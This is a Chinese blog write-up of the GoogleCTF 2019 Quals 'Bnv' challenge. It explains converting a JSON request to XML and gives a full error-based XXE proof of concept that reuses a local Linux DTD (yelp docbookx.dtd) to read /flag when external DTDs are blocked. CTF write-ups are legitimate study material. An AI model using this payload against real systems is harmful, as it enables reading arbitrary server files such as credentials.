[GoogleCTF2019 Quals]Bnv 目标不能加载外部dtd，利用linux本身的dtd

2022年7月26日 14:19 • 智能运维

抓包发现传参json格式的数据，可以尝试xxe

先把content-type改为application/xml，再把json格式的数据改为xml格式的数据

最终poc:

<?xml version="1.0"?>
<!DOCTYPE message[
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///flag">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///aaaaa/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
'>
%local_dtd;
]>

原创文章，作者：Carrie001128，如若转载，请注明出处：https://blog.ytso.com/tech/aiops/277105.html

0 0

centos 添加公钥，root不用输入密码 ssh-keygen

上一篇 2022年7月26日 14:19

linux防火墙设置

下一篇 2022年7月26日 14:19

发表回复

登录后才能评论

[GoogleCTF2019 Quals]Bnv 目标不能加载外部dtd，利用linux本身的dtd

相关推荐

发表回复